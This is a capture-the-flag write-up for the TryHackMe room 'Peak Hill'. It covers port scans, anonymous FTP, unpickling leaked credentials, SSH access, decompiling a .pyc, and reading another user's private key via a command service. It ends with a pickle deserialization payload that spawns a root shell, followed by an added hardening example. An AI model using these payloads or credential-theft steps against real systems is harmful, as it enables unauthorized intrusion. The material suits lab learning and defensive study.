# Peak Hill

**Room Link:** [**https://tryhackme.com/room/peakhill**](https://tryhackme.com/room/peakhill)

## **Scans**

Initial scan

**Kali**

```
nmap -A $VICTIM
```

<figure><img src="/files/oscRsHwYq7zR1VrWZWMV" alt=""><figcaption></figcaption></figure>

Longer scan

**Kali**

```
nmap -sV -sT -O -p 1-65535 $VICTIM
```

<figure><img src="/files/e1LKEhdOTIIdc4syoFPR" alt=""><figcaption></figcaption></figure>

## TCP/21 - **FTP**

**Kali**

```
ftp $VICTIM 21
username: anonymous
```

Listing the share with `ls -lah` showed test.txt, which contained nothing useful, and a hidden `.creds` file, so both were downloaded in binary mode.

**Kali(ftp)**

```
ls -lah
binary
passive
get test.txt
get .creds
```

<figure><img src="/files/TjICh57WIkJtkHI1NDwY" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/I8KMeeWSgU1P4o1vSgxd" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/U7iaElsCOJKi4NpXcBBN" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/cQ1cLlHf1Z0yg86uYkkI" alt=""><figcaption></figcaption></figure>

#### Unpickle Program

#### read.py

```
import pickle

# download.dat is the pickled credential blob recovered from the FTP share.
# pickle.loads() runs whatever callables the stream references, so only
# unpickle data you are prepared to execute.
with open("download.dat", "rb") as file:
    pickle_data = file.read()

creds = pickle.loads(pickle_data)
print(creds)
```

**Kali**

```
python read.py
```

<figure><img src="/files/DOL2x0oU9GR2KQV9mMrk" alt=""><figcaption></figcaption></figure>

**output.txt**

```
[('ssh_pass15', 'u'), ('ssh_user1', 'h'), ('ssh_pass25', 'r'), ('ssh_pass20', 'h'), ('ssh_pass7', '_'), ('ssh_user0', 'g'), ('ssh_pass26', 'l'), ('ssh_pass5', '3'), ('ssh_pass1', '1'), ('ssh_pass22', '_'), ('ssh_pass12', '@'), ('ssh_user2', 'e'), ('ssh_user5', 'i'), ('ssh_pass18', '_'), ('ssh_pass27', 'd'), ('ssh_pass3', 'k'), ('ssh_pass19', 't'), ('ssh_pass6', 's'), ('ssh_pass9', '1'), ('ssh_pass23', 'w'), ('ssh_pass21', '3'), ('ssh_pass4', 'l'), ('ssh_pass14', '0'), ('ssh_user6', 'n'), ('ssh_pass2', 'c'), ('ssh_pass13', 'r'), ('ssh_pass16', 'n'), ('ssh_pass8', '@'), ('ssh_pass17', 'd'), ('ssh_pass24', '0'), ('ssh_user3', 'r'), ('ssh_user4', 'k'), ('ssh_pass11', '_'), ('ssh_pass0', 'p'), ('ssh_pass10', '1')]
```

**Kali**

```
cat output.txt | sed "s/), (/)\n/g" | grep ssh_user
```

<figure><img src="/files/DwqYpgwncXsveH3l22fI" alt=""><figcaption></figcaption></figure>

**Username**

```
gherkin
```

**Kali**

```
cat output.txt | sed "s/), (/)\n/g" | grep ssh_pass
```

<figure><img src="/files/ZpOPLHswgAb3wgHyHJn2" alt=""><figcaption></figcaption></figure>

**Password**

```
p1ckl3s_@11_@r0und_th3_w0rld
```
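Reading the characters off by eye from the grep output is error-prone because the tuples are unordered. The following script, an added example that is not part of the original walkthrough, takes the list exactly as read.py printed it and rebuilds each field by sorting on the numeric suffix, refusing to produce a string if any position is missing.

```python
import re
from typing import Dict, List, Tuple

# Tuple list exactly as printed by read.py (copied from output.txt above).
CREDS: List[Tuple[str, str]] = [('ssh_pass15', 'u'), ('ssh_user1', 'h'), ('ssh_pass25', 'r'), ('ssh_pass20', 'h'), ('ssh_pass7', '_'), ('ssh_user0', 'g'), ('ssh_pass26', 'l'), ('ssh_pass5', '3'), ('ssh_pass1', '1'), ('ssh_pass22', '_'), ('ssh_pass12', '@'), ('ssh_user2', 'e'), ('ssh_user5', 'i'), ('ssh_pass18', '_'), ('ssh_pass27', 'd'), ('ssh_pass3', 'k'), ('ssh_pass19', 't'), ('ssh_pass6', 's'), ('ssh_pass9', '1'), ('ssh_pass23', 'w'), ('ssh_pass21', '3'), ('ssh_pass4', 'l'), ('ssh_pass14', '0'), ('ssh_user6', 'n'), ('ssh_pass2', 'c'), ('ssh_pass13', 'r'), ('ssh_pass16', 'n'), ('ssh_pass8', '@'), ('ssh_pass17', 'd'), ('ssh_pass24', '0'), ('ssh_user3', 'r'), ('ssh_user4', 'k'), ('ssh_pass11', '_'), ('ssh_pass0', 'p'), ('ssh_pass10', '1')]

# Key layout is <field name><decimal position>, e.g. "ssh_pass15".
FIELD_RE = re.compile(r"^(?P<name>[a-z_]+?)(?P<idx>\d+)$")


def reassemble(pairs: List[Tuple[str, str]]) -> Dict[str, str]:
    """Group (name+index, char) tuples by field name and join the characters
    in index order. Raises ValueError on an unexpected key or a gap in the
    indices rather than silently returning a wrong credential."""
    buckets: Dict[str, Dict[int, str]] = {}
    for key, ch in pairs:
        m = FIELD_RE.match(key)
        if not m:
            raise ValueError(f"unexpected key: {key!r}")
        buckets.setdefault(m["name"], {})[int(m["idx"])] = ch

    result: Dict[str, str] = {}
    for name, chars in buckets.items():
        missing = set(range(len(chars))) - set(chars)
        if missing:
            raise ValueError(f"{name}: missing positions {sorted(missing)}")
        result[name] = "".join(chars[i] for i in range(len(chars)))
    return result


if __name__ == "__main__":
    for field, value in reassemble(CREDS).items():
        print(f"{field}: {value}")
```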

## TCP/22 - **SSH**

**Kali**

```
ssh gherkin@$VICTIM
Password: p1ckl3s_@11_@r0und_th3_w0rld
```

<figure><img src="/files/qMFgoId9dQlSUfymraCC" alt=""><figcaption></figcaption></figure>

There is a .pyc file in the home directory. .pyc files are generated automatically by the interpreter when a module is imported, which speeds up later imports of that module; they are therefore only created from a .py file when it is imported by another .py file or module. We can use uncompyle6 (a native Python cross-version decompiler and fragment decompiler) to recover the original Python source.

**Victim**

```
ls -lah
cat cmd_service.pyc
```

<figure><img src="/files/PoJIUzi7teiMnesg7hgl" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/B1Jbxy958V0oUpOFJ34Q" alt=""><figcaption></figcaption></figure>

Transfer the file to Kali, then decompile it:

**Kali**

```
scp gherkin@$VICTIM:/home/gherkin/cmd_service.pyc /root/
Password: p1ckl3s_@11_@r0und_th3_w0rld
```

**Kali**

```
sudo pip install uncompyle6
uncompyle6 cmd_service.pyc 
```

We can see some interesting things in the decompiled file: a username and password stored as large integers, and a service running on port 7321, which also came up in our scans.

<figure><img src="/files/zAvVpCEkMkcNwrY1SAB7" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/PCwBZdmEOxSJ5bn8IvSm" alt=""><figcaption></figcaption></figure>

Reusing a piece of the decompiled code recovers the username and password from those integers.

**output.py**

```
# Only long_to_bytes is needed from the decompiled file's import block
# (pip install pycryptodome provides Crypto.Util.number).
from Crypto.Util.number import long_to_bytes

# Integer constants copied from the decompiled cmd_service.pyc.
username = long_to_bytes(1684630636)
password = long_to_bytes(2457564920124666544827225107428488864802762356)

# Big-endian byte strings of the integers are the ASCII credentials.
print(username.decode())
print(password.decode())
```

**Kali**

```
python output.py
```

<figure><img src="/files/10nslx5NI3Wv0yykdYFB" alt=""><figcaption></figcaption></figure>

## TCP/7321 - Script

**Kali**

```
nc $VICTIM 7321
Username: dill
Password: n3v3r_@_d1ll_m0m3nt
```

<figure><img src="/files/BExhSvKyR9eiRIKPO3NT" alt=""><figcaption></figcaption></figure>

**Kali**

```
Cmd: ls -lah /home/dill/.ssh
Cmd: cat /home/dill/.ssh/id_rsa
Cmd: cat /home/dill/.ssh/id_rsa > /tmp/id_rsa
```

<figure><img src="/files/4GdhGC10YfEgRgk9tf3Y" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/8YrjpTEhMR6MF87XBYLT" alt=""><figcaption></figcaption></figure>

**Kali**

```
scp gherkin@$VICTIM:/tmp/id_rsa /root/
Password: p1ckl3s_@11_@r0und_th3_w0rld
```

**Kali**

```
chmod 600 id_rsa
ssh -i id_rsa dill@$VICTIM
```

<figure><img src="/files/illzqYXmU26AZudryVZA" alt=""><figcaption></figcaption></figure>

**Victim**

```
sudo -l
```

<figure><img src="/files/qB4Ipy0RJFP2hXL5fOn5" alt=""><figcaption></figcaption></figure>

**Victim**

```
sudo /opt/peak_hill_farm/peak_hill_farm
pickle
```

<figure><img src="/files/WCnrirNAXIxpcs1EooC2" alt=""><figcaption></figcaption></figure>

**serial.py**

```
import pickle
import os
import base64


class EvilPickle(object):
    # __reduce__ tells pickle how to rebuild the object: here it says
    # "call os.system('/bin/bash')", which runs at unpickling time.
    def __reduce__(self):
        return (os.system, ('/bin/bash',))


# Protocol 3 reproduces the base64 shown below; newer Pythons default to 4.
pickle_data = pickle.dumps(EvilPickle(), protocol=3)
payload = base64.b64encode(pickle_data)
print(payload.decode())
```

**Kali**

```
python serial.py 
```

<figure><img src="/files/PcS8wWaIFuxAu4L4sMvr" alt=""><figcaption></figcaption></figure>

**Victim**

```
sudo /opt/peak_hill_farm/peak_hill_farm
gANjcG9zaXgKc3lzdGVtCnEAWAkAAAAvYmluL2Jhc2hxAYVxAlJxAy4=
```

<figure><img src="/files/G3YfP19egtGCaIYhB8UR" alt=""><figcaption></figcaption></figure>
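The root shell comes from peak_hill_farm passing the base64 blob straight into pickle.loads, which resolves and calls whatever `__reduce__` names. As an added example (not the room's binary or the writeup's code), this is how such a program could be hardened with a restricted unpickler, in the style of the Python docs, that refuses every module-level reference, plus a static opcode scan that spots the serial.py payload without executing it. Plain data such as the .creds list still loads.

```python
import base64
import io
import pickle
import pickletools
from typing import Any, List, Tuple

# Payload produced by serial.py (copied from the walkthrough above).
EVIL_B64 = "gANjcG9zaXgKc3lzdGVtCnEAWAkAAAAvYmluL2Jhc2hxAYVxAlJxAy4="
EVIL_PICKLE = base64.b64decode(EVIL_B64)

# Opcodes that import a global or call a callable; plain data never needs them.
SUSPICIOUS = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ",
              "NEWOBJ", "NEWOBJ_EX", "BUILD"}


def suspicious_opcodes(data: bytes) -> List[str]:
    """Static scan with pickletools: list code-capable opcodes, in order,
    without running the pickle."""
    return [op.name for op, _, _ in pickletools.genops(data) if op.name in SUSPICIOUS]


class NoGlobalsUnpickler(pickle.Unpickler):
    """Unpickler that only allows built-in data types: any attempt to
    resolve module.name (the step behind __reduce__) is refused."""

    def find_class(self, module: str, name: str) -> Any:
        raise pickle.UnpicklingError(
            f"refusing to resolve {module}.{name}: globals are not allowed")


def try_load(data: bytes) -> Tuple[str, Any]:
    """Return ('ok', obj) for plain data, ('rejected', reason) otherwise."""
    try:
        return ("ok", NoGlobalsUnpickler(io.BytesIO(data)).load())
    except pickle.UnpicklingError as exc:
        return ("rejected", str(exc))


def encode_plain(obj: Any) -> bytes:
    """Pickle plain data with the same protocol peak_hill_farm's payload used."""
    return pickle.dumps(obj, protocol=3)


if __name__ == "__main__":
    # Constructed benign input: the shape of list the .creds blob held.
    benign = encode_plain([("ssh_user0", "g"), ("ssh_user1", "h")])
    print(suspicious_opcodes(benign), try_load(benign))
    print(suspicious_opcodes(EVIL_PICKLE), try_load(EVIL_PICKLE))
```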
